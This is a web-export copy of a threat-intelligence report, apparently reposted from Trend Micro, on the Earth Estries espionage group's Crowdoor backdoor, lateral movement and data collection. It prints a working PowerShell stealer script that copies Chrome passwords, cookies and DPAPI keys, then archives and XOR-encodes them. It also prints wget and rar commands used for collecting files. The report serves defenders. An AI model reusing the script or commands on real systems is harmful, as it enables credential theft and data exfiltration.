{"id":57624,"date":"2024-11-08T00:00:00","date_gmt":"2024-11-08T00:00:00","guid":{"rendered":"urn:uuid:af1eafb5-cda0-7f9a-5e6d-f97a0ec28008"},"modified":"2024-11-08T00:00:00","modified_gmt":"2024-11-08T00:00:00","slug":"breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","title":{"rendered":"Breaking Down Earth Estries&#8217; Persistent TTPs in Prolonged Cyber Operations"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/estries-976:Large?qlt=80\"><\/p>\n<div><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/24\/estries-976.png\" class=\"ff-og-image-inserted\"><\/div>\n<p>Crowdoor will perform different actions based on the corresponding argument. In table 1, we summarize the behaviors exhibited by the new Crowdoor variant based on the arguments used. Overall, the behaviors are similar to the ones seen in the older variant, with the difference being the injected process (<i>msiexec.exe<\/i>) and Command IDs (shown in table 2)<\/p>\n<table cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"4\">\n<tr>\n<th scope=\"col\">Arguments<\/th>\n<th scope=\"col\">Action<\/th>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"34\" width=\"474\">No argument<\/td>\n<td width=\"474\">Persistence is set through the registry Run key or a service and the backdoor is restarted<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"34\" width=\"474\">0<\/td>\n<td width=\"474\">Persistence is set through the registry Run key or a service and the backdoor is restarted.<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"34\" width=\"474\">1<\/td>\n<td width=\"474\">The backdoor is restarted by injecting to &#8216;msiexec.exe&#8217;<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"34\" width=\"474\">2<\/td>\n<td width=\"474\">The backdoor main function is called<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><sup>Table 1. List of arguments and their corresponding actions<\/sup><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"5.5\">\n<tr>\n<th scope=\"col\">Old Crowdoor variant<\/th>\n<th scope=\"col\">New Crowdoor variant<\/th>\n<th scope=\"col\">Functions<\/th>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347135<\/td>\n<td width=\"474\">0x11736212<\/td>\n<td width=\"474\">Initial connection C2<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"23\" width=\"474\">0x2347136<\/td>\n<td width=\"474\">0x11736213<\/td>\n<td width=\"474\">Collect ComputerName,Username, OS version and hostnet or IP information<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347137<\/td>\n<td width=\"474\">0x11736214<\/td>\n<td width=\"474\">Remote shell<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td height=\"23\" width=\"474\">0x234713B<\/td>\n<td width=\"474\">0x11736218<\/td>\n<td width=\"474\">Delete malware files, persistence and exit<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347140<\/td>\n<td width=\"474\">0x1173621D<\/td>\n<td width=\"474\">File related Operation<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347141<\/td>\n<td width=\"474\">0x1173621E<\/td>\n<td width=\"474\">Open\/ReadFile<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347142<\/td>\n<td width=\"474\">0x1173621F<\/td>\n<td width=\"474\">Open\/WriteFile<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"23\" width=\"474\">0x2347144<\/td>\n<td width=\"474\">0x11736221<\/td>\n<td width=\"474\">Collect drive information<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347145<\/td>\n<td width=\"474\">0x11736222<\/td>\n<td width=\"474\">Search File<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347148<\/td>\n<td width=\"474\">0x11736225<\/td>\n<td width=\"474\">CreateDirectory<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x2347149<\/td>\n<td width=\"474\">0x11736226<\/td>\n<td width=\"474\">Rename file or directory<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">0x234714A<\/td>\n<td width=\"474\">0x11736227<\/td>\n<td width=\"474\">Delete file or Directory<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td height=\"23\" width=\"474\">0x234714A<\/td>\n<td width=\"474\">0x11736228<\/td>\n<td width=\"474\">Communication with C&amp;C server&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><sup>Table 2. Comparison between old and new Crowdoor variants<\/sup><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody>\n<tr>\n<th scope=\"col\">Package 1<\/th>\n<th scope=\"col\">Package 2<\/th>\n<th scope=\"col\">Package 3<\/th>\n<th scope=\"col\">Package 4<\/th>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">WinStore.exe (Host)<\/td>\n<td width=\"474\">K7Sysmon.exe (Host)<\/td>\n<td width=\"474\">HxTsk.exe (Host)<\/td>\n<td width=\"474\">MsMsRng.exe (Host)<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">Sqlite3.dll<\/td>\n<td width=\"474\">K7Sysmn1.dll<\/td>\n<td width=\"474\">d3d8.dll<\/td>\n<td width=\"474\">sqlite3.dll<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">datastate.dll<\/td>\n<td width=\"474\">K7Sysmn2.dll<\/td>\n<td width=\"474\">HxTsk (encrypted)<\/td>\n<td width=\"474\">msimg32.dll<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">datast.dll<\/td>\n<td width=\"474\">K7Sysmn3.dll<\/td>\n<td width=\"474\">&nbsp;<\/td>\n<td width=\"474\">datastate.dll<\/td>\n<\/tr>\n<tr>\n<td height=\"23\" width=\"474\">WinStore (encrypted)<\/td>\n<td width=\"474\">K7Sysmon.dll (encrypted)<\/td>\n<td width=\"474\">&nbsp;<\/td>\n<td width=\"474\">MsMsRng (encrypted)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><sup>Table 3. Crowdoor packages<\/sup><\/p>\n<h2><span class=\"body-subhead-title\">Lateral Movement<\/span><\/h2>\n<p>Earth Estries uses PSExec to laterally install its backdoors and tools, notably by copying the <i>CAB<\/i> files containing the backdoors or tools, and a batch file to perform the installation, maintain persistence, and execute the tools.<\/p>\n<p>Typically, PSExec is used to copy the CAB file containing the malware that will be laterally installed. However,in some instances, WMIC may be used in its place to achieve similar results. A set of batch files will then be copied and executed to perform the extraction, installation, and execution of the malware. Large scale collection may also be executed using batch files.<\/p>\n<p>In later stages of the attack, the backdoors may be used directly to perform lateral movement. CAB files are still used as containers for the tools to be installed, and batch files are still incorporated in the extraction, installation and execution of said tools. This will sometimes include the creation of persistence mechanisms for the batch file to act as an indirect persistence mechanism for the actual backdoors.<\/p>\n<h2><span class=\"body-subhead-title\">Discovery, collection and exfiltration<\/span><\/h2>\n<p><b>TrillClient\u2019s user credential discovery<\/b><\/p>\n<p>Earth Estries will collect user credentials that can be used to further its objectives. The threat actor employs the <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/h\/earth-estries-targets-government-tech-for-cyberespionage.html\" title=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/h\/earth-estries-targets-government-tech-for-cyberespionage.html\">TrillClient<\/a> information stealer for this routine, primarily collecting user credentials from browser user profiles. TrillClient launches a PowerShelll script that will collect user profiles to be saved at a specific location:<\/p>\n<p><span class=\"blockquote\">foreach($win_user_path in $users_path){<\/span><\/p>\n<p>echo D | xcopy \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Roaming\\Microsoft\\Protect\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\Protect\\&#8221; \/E \/C \/H;<\/p>\n<p>attrib -a -s -r -h \\&#8221;$copy_dest_path\\$win_user_path\\*\\&#8221; \/S \/D;<\/p>\n<p>echo F | xcopy \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\Local State\\&#8221; \/C;<\/p>\n<p>echo F | xcopy \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\Default\\Network\\Cookies\\&#8221; \/C<\/p>\n<p>echo F | xcopy \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\Default\\Login Data\\&#8221; \/C;<\/p>\n<p>$profile_path = Get-ChildItem -Name \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\\\\\<\/b>&#8221; -Include *Profile* -ErrorAction SilentlyContinue;<\/p>\n<p>foreach($chrome_user_path in $profile_path){<\/p>\n<p>echo F | xcopy \\&#8221;<b>C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\$chrome_user_path\\Network\\Cookies\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\$chrome_user_path\\Network\\Cookies\\&#8221; \/C;<\/p>\n<p>echo F | xcopy \\<b>&#8220;C:\\Users\\$win_user_path\\AppData\\Local\\Google\\Chrome\\User Data\\$chrome_user_path\\Login Data\\<\/b>&#8221; \\&#8221;$copy_dest_path\\$win_user_path\\$chrome_user_path\\Login Data\\&#8221; \/C;<br \/><b><br \/>&nbsp; &nbsp;}<br \/>}<\/b><\/p>\n<p>Data will be collected from the following folders:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>%LOCALAPPDATA%\\Google\\Chrome\\User Data\\&lt;PROFILE&gt;\\Login Data<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>%LOCALAPPDATA%\\Google\\Chrome\\User Data\\&lt;PROFILE&gt;\\Network\\Cookies<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>%APPDATA%\\Microsoft\\Protect\\*<\/i><\/span><\/li>\n<\/ul>\n<p>The collected data will be temporarily copied to <i>&lt;%TEMP%\\browser_temp_data&lt;RANDOM&gt;&gt;<\/i>, archived using the <i>tar<\/i> command, and encrypted with an XOR algorithm.<\/p>\n<p><span class=\"blockquote\">tar -cvf \\&#8221;$copy_dest_path\\tar\\&#8221; $copy_dest_path;<\/span><\/p>\n<p>$e_a = [System.IO.File]::ReadAllBytes(\\&#8221;$copy_dest_path\\tar\\&#8221;);Remove-Item -Path $copy_dest_path -Recurse;<\/p>\n<p>$e_i = 0;foreach($e_c in $e_a){$e_a[$e_i] = (($e_c -bxor ($e_i % 252)) -bxor (0xe6 &#8211; ($e_i % 199)));$e_i += 1;<\/p>\n<p>$random_filename = \\&#8221;300775736611547784207972935122149919289871693\\&#8221;;<\/p>\n<p>$out_put_file = $out_put_path + \\&#8221;\\\\\\&#8221; + $random_filename;<\/p>\n<p>echo $out_put_file;<\/p>\n<p>[System.IO.File]::WriteAllBytes($out_put_file, $e_a);<\/p>\n<p>The collected data will then be sent to the threat actor\u2019s Gmail account over Simple Mail Transfer Protocol (SMTP).<\/p>\n<p><b>Collection of sensitive documents<\/b><\/p>\n<p>Earth Estries utilizes RAR for collecting information of interest. On this attack scenario, they utilize wget to download target documents from an internal web-based document management platform to a collection folder before archiving them.<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">In this instance, a batch file containing commands to download PDF files to the collection directory is executed, containing hardcoded document names:<\/span>\n<ul>\n<li><span class=\"rte-square-bullet\">c:\\users\\public\\music\\temp\\wget.exe -c &#8220;hxxp:\/\/172.16.xx.xx\/{document path}\/{Hardcoded Filename}.pdf&#8221; -P c:\\users\\public\\music\\temp<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span class=\"rte-red-bullet\">Afterwards, collected PDF\u2019s are archived<\/span>\n<ul>\n<li><span class=\"rte-square-bullet\">C:\\Windows\\system32\\cmd.exe \/C C:\\Users\\Public\\Music\\rar.exe a -m5 C:\\Users\\Public\\Music\\pdf0412.rar C:\\Users\\Public\\Music\\temp\\*.pdf<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><b>Collection via backdoor<\/b><\/p>\n<p>Earth Estries uses both Crowdoor and Cobalt Strike installations for collection routines by archiving information of interest both from both local and remote locations. Some examples of collection commands performed are as follows:<\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\" width=\"100%\" height=\"10%\">\n<tbody readability=\"8\">\n<tr>\n<th scope=\"col\">Example command<\/th>\n<th scope=\"col\">Functions<\/th>\n<\/tr>\n<tr readability=\"4\">\n<td height=\"23\" width=\"474\">rar.exe&nbsp; a -m5 &lt;install path&gt;\\322.rar \\\\&lt;remote machine&gt;\\c$\\&lt;remote path&gt;<\/td>\n<td width=\"474\">Collect Gather information collected by an older generation of infection from a remote machine<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td height=\"23\" width=\"474\">rar.exe&nbsp; a -m5 &lt;install path&gt; \\his231.rar &#8220;C:\\Users\\&lt;username&gt;\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History&#8221;<\/td>\n<td width=\"474\">Collect browser history files, which are of. Of interest to the attackers to be able to compromise more credentials<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td height=\"23\" width=\"474\">rar.exe&nbsp; a &lt;install path&gt;\\0311.rar C:\\users\\&lt;user name&gt;\\Desktop\\* C:\\users\\ &lt;user name&gt; \\Downloads\\* C:\\users\\ &lt;user name&gt; \\Documents\\* -r -y -ta&lt;cutoff date&gt;<\/td>\n<td width=\"474\">Collection ofCollect more recent files and\/or documents interacted with by a local user<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><sup>Table 4. Collection commands<\/sup><\/p>\n<p>Telemetry suggests that they were exfiltrated through the same methods that the collection command is executed: either through the command-and-control (C&amp;C) channels of their backdoors, or through the same initial access method used to control these tools.<\/p>\n<p>An overview of the second Earth Estries attack flow is shown in figure 3:<\/p>\n<p> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/k\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-o.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Discover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as Zingdoor and Snappybee, for its campaigns. Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":57625,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9508,9509],"class_list":["post-57624","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-research"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Breaking Down Earth Estries&#039; Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Breaking Down Earth Estries&#039; Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-11-08T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/estries-976:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Breaking Down Earth Estries&#8217; Persistent TTPs in Prolonged Cyber Operations\",\"datePublished\":\"2024-11-08T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/\"},\"wordCount\":1211,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/11\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/\",\"name\":\"Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/11\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png\",\"datePublished\":\"2024-11-08T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/11\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/11\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png\",\"width\":976,\"height\":533},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Breaking Down Earth Estries&#8217; Persistent TTPs in Prolonged Cyber Operations\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","og_locale":"en_US","og_type":"article","og_title":"Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-11-08T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/estries-976:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Breaking Down Earth Estries&#8217; Persistent TTPs in Prolonged Cyber Operations","datePublished":"2024-11-08T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/"},"wordCount":1211,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/11\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : Endpoints","Trend Micro Research : Research"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","url":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/","name":"Breaking Down Earth Estries' Persistent TTPs in Prolonged Cyber Operations 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2024\/11\/breaking-down-earth-estries-persistent-ttps-in-prolonged-cyber-operations.png","datePublished":"2024-11-08T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity 